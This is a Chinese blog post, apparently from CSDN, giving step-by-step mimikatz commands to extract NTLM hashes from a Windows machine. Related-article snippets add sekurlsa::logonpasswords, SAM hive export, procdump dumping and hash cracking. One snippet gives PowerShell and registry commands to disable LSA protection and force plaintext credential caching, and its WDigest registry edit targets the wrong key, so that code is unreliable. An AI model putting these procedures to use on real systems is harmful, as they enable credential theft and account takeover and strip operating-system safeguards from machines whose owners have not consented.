使用mimikatz获取windows密码凭证

最新推荐文章于 2025-03-17 20:00:16 发布
最新推荐文章于 2025-03-17 20:00:16 发布
阅读量1.9k 收藏 3
点赞数 3
文章标签: 安全 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuteyann/article/details/130732849
版权

工具:mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz/releases

1、开启mimikatz。以管理员权限打开cmd,进入mimikatz相应操作系统的目录下,输入命令:

mimikatz.exe

 

2、提升权限,输入命令:

 privilege::debug

(如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)

3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

 token::elevate

 3、权限提升至 NT AUTHORITY\SYSTEM,输入命令:

token::elevate

 4、获取到NTLM的hash,输入命令:

lsadump::sam

 

 

L_yann
关注
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4893
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
查看Windows凭据和普通凭据密码(查看Windows中存储的密码)——mimikatz
热门推荐
一碗单炒饭的专栏
02-10 7万+
使用mimikatz进行Windows中存储的密码查看 查看Windows为你管理的凭据 路径:控制面板\所有控制面板项\凭据管理器 软件下载 https://github.com/gentilkiwi/mimikatz/releases 下载完成后,以管理员方式运行mimikatz 查看Windows凭据 输入下方两个指令(#号后面的) mimikatz # privilege::debug...
11--使用 mimikatz 提取 windows凭据密码
SunShine
06-28 4万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
内网渗透工具(Mimikatz
最新发布
尘玥的故事
03-17 946
能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,Mimikatz使用通常需要管理员权限,因为它需要访问系统的核心进程和内存。注意:当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
windows凭据收集
fzy2003的博客
07-10 606
掌握windows凭据的收集方法。
域用户组成员 导出_隐私安全,黑客利用Mimikatz提取Windows用户凭证
weixin_39631572的博客
12-03 481
一、前言一.mimikatz简介 是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。二、Mimikatz提取用户凭证M...
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7608
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
获取Windows系统密码凭证 (゚益゚メ) 渗透测试
寻觅的博客
03-04 3904
文章目录Windows 加密简介Windows 哈希过程Windows 凭证获取使用猕猴桃(mimikatz) Windows 加密简介 在Windows系统中,通常会使用哈希(hash)转化我们存入的密码,哈希是将目标文本转换成具有相同长度的,不可逆的字符串,具体到应用层还有很多不同的分支,Windows早期版本大多使用LAN Manager(LM)方法进行哈希,但LM哈希密码最大长度为14,当前Windows主要采用NT LAN Manager(NTLM)方法哈希。 Windows系统下hash密码格式
mimikatz获取系统密码
03-28
**mimikatz获取系统密码** 在网络安全领域,mimikatz是一款著名的工具,由法国安全研究员Benjamin Delpy开发。它主要用于提取操作系统中的敏感信息,如明文密码、NTLM哈希、kerberos票证等。mimikatz在渗透测试和...
获取Windows明文密码mimikatz2.2-x64.rar
03-19
标题 "获取Windows明文密码mimikatz2.2-x64.rar" 指向的是一个使用Mimikatz工具来提取Windows系统中明文密码的过程。Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统安全分析,特别是...
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2984
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
mimikatz.exe windows密码查看
07-12
cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称---------结束进程 process::modules --列出系统的核心模块及所在位置 service::list---------------列出系统的服务 service::remove-----------移除系统的服务 service::start stop 服务名称--启动或停止服务 privilege::list---------------列出权限列表 privilege::enable--------激活一个或多个权限 privilege::debug-----------------提升权限------------------ nogpo::cmd------------打开系统的cmd.exe nogpo::regedit -----------打开系统的注册表 nogpo::taskmgr-------------打开任务管理器 ts::sessions-----------------显示当前的会话 ts::processes------显示进程和对应的pid情况等 sekurlsa::wdigest-----获取本地用户信息及密码 sekurlsa::tspkg------获取tspkg用户信息及密码 sekurlsa::logonPasswords--获登陆用户信息及密码----------------
常用mimikatz命令合集
03-08
这是我平时使用时觉得最常用的一些命令合集,希望可以帮到大家.
通过PowerShell使用mimikatz提取Windows密码
Mimikatz_trunk_powershell_资源包提供了一个将Mimikatz集成到PowerShell环境中的方法,使得安全研究者可以使用PowerShell脚本来获取Windows系统中的敏感信息。该工具包中的组件包含了支持文档和可能的配置文件,但...
使用mimikatz获取和创建Windows凭据的工具和方法
weixin_30772261的博客
05-28 968
Mimikatz 下载地址 https://github.com/gentilkiwi/mimikatz/releases 本地凭据破解 以管理员身份运行(拿到shell提权后) mimikatz#privilege::debug "测试是否OK,正确的返回应该是Privilege '20' OK" mimikatz#sekurlsa::logonpasswords "获取本机用户名、口令、S...
利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp
2401_84969443的博客
05-14 1072
szDescription : 本地凭据数据。
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 3041
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
mimikatz获取密码_mimikatz实战域渗透抓取域控管理员密码
weixin_39562327的博客
12-24 999
实验环境:攻击机:Kali ;靶 机:Windows server 2012 ;工具:mimikatz2.1;条件:靶机获取到shell之后必须是管理员的权限;步骤:**我这里攻击利用的msf里面的regsvr32_applocker_bypass_server模块 利用的是注册表漏洞** ps:其实这个也不远是漏洞,是微软自己不承认它是漏洞,但是黑客可以利用这个BUG下面我们就要利用msf生成攻...
mimikatz获取win10密码 变为空值
01-16
### MimikatzWindows 10 上获取密码返回 Null 的解决方案 在某些版本的 Windows 10 中,由于微软增强了安全机制,Mimikatz 可能无法正常提取明文密码或哈希值,这通常是因为启用了保护内存中的凭证功能[^1]。 为了绕过此限制并成功获取密码,建议采取以下方法: #### 方法一:禁用 LSA 保护 通过组策略编辑器或注册表来关闭LSA (Local Security Authority)进程的强制完整性级别。具体操作如下: ```powershell Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 0 ``` 重启计算机使更改生效后再尝试使用 Mimikatz 提取凭据。 #### 方法二:利用 WDigest 明文存储漏洞 对于特定版本的操作系统,在默认情况下会阻止 wdigest.dll 加载从而影响 mimikatz 对于 NTLM hash 和 plaintext password 的读取。可以通过修改注册表重新启用它: ```powershell New-Item 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation' -Force | Out-Null New-ItemProperty -path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\' -name AllowProtectedCreds -value 0 –PropertyType DWORD ``` 同样需要重启机器让配置更新。 #### 方法三:加载自定义模块 如果上述两种方式均不可行,则考虑编写或寻找适用于最新版系统的 Mimikatz 插件/补丁程序,这些插件可能已经针对新的防护措施进行了优化处理。 值得注意的是,以上所有操作都涉及到对操作系统核心组件的安全设置做出调整,因此仅限合法授权范围内测试环境内执行,并且应当充分评估潜在风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值